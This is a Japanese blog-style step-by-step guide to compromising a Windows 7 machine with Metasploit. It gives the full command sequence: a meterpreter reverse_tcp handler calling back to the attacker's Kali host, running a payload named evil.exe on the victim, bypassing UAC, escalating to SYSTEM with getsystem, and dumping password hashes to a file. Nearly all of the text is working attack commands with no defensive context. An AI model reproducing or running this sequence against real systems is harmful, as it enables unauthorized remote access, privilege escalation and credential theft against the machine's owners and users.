Windows7 パスワードハッシュ入手

Windows7 パスワードハッシュ入手

KaliLinux を起動し

1
msfconsole


Metaploit を起動

msf コンソールが起動したら

1
use exploit/multi/handler

でハンドラーモジュールを使用

1
set payload windows/meterpreter/reverse_tcp

でペイロードをセット

1
set LHOST 192.168.1.134

で KaliLInux のIPアドレスを設定

1
show options

で設定を確認

これで

1
exploit

でペイロードが実行され、待受状態になるので

windows7 で evil.exe を実行

これで Meterpreter セッションが確率される

この状態からパスワードハッシュを入手しようとしても
ユーザ権限が低いためエラーとなる

このため

1
background

というように
background コマンドを使い
Meterpreter セッションをバックグラウンドにして
msf プロンプトにする

接続中のMeterpreter セッションの確認には

1
sessions -i

で確認できる

このときに Id をみておくことで

1
sessions -i セッションID

とすれば
Meterpreter セッションに戻すことができる

今回なら

1
sessions -i 1

とすれば
Meterpreter セッションに戻すことができる

次にUAC機能をバイパスするモジュールを使う
これは確率済みセッションを通して Exploit を送る

1
use exploit/windows/local/bypassuac

で使用するペイロードをセット

1
show options

でオプションで使用するセッションIDが必要なのがわかる

次に

1
set SESSION 1

でセッションをセット

そして再度 reverse_tcp を設定

1
set payload windows/meterpreter/reverse_tcp

でペイロードをセット

1
set LHOST 192.168.1.134

で KaliLInux のIPアドレスを設定

1
show options

で設定を確認

これで

1
exploit

でUAC機能をバイパスした状態で実行できる

これで

1
getuid

で現状のユーザIDを確認

次に権限昇格

1
getsystem -t 1

これでユーザ権限を確認するとSYSTEM権限になっているのがわかる

1
getuid

あとはパスワードハッシュをダンプ

1
run hashdump

実行結果をテキストファイルへ保存

今回は hash.txt というファイルへ保存

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です